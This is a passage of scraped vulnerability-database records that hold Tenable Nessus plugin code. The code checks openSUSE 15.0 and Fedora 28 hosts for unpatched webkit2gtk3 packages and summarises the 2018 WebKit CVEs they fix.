"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-845.NASL", "href": "https://www.tenable.com/plugins/nessus/111626", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-845.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111626);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)\");\n script_summary(english:\"Check for the openSUSE-2018-845 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:22:54", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues. This update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-566.NASL", "href": "https://www.tenable.com/plugins/nessus/123245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-566.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123245);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)\");\n script_summary(english:\"Check for the openSUSE-2019-566 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:15:27", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4190), [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4199), [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4218), [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4222), [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4232), [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4233), [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4246), [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : webkit2gtk3 (2018-118b9abf99)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkit2gtk3", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-118B9ABF99.NASL", "href": "https://www.tenable.com/plugins/nessus/120240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-118b9abf99.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120240);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n\n script_name(english:\"Fedora 28 : webkit2gtk3 (2018-118b9abf99)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n 